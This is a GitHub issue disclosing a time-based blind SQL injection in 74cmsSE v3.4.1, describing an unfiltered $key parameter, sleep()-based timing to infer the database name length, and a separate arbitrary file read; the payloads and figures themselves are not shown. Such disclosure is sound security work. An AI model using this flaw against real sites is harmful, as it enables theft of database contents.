Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection vulnerability #8

PAINCLOWN opened this issue Jun 9, 2022 · 0 comments

SQL Injection vulnerability #8

PAINCLOWN opened this issue Jun 9, 2022 · 0 comments


Copy link

@PAINCLOWN PAINCLOWN commented Jun 9, 2022

Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.4.1
Date of Discovery: 5/5/2022
Product version:74cmsSE_v3.4.1
Download link
Vulnerability Description:
74cmsSE_v3.4.1 has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data.


In the path
is not strictly filtered for $key, resulting in SQL injection


As you can see from the figure above, the sleep() function is executed, and there is a time blind-SQL
With the payload test above, it is possible that the sleep() function being executed twice.
Time blinds are possible to guess the length of the database:


As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is "hsjp ", and the delay as exactly double the length of database(), so the injection is successfull

It's a time-based SQL injection
Suggest: Add a filter function to this parameter

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
None yet
None yet

No branches or pull requests

1 participant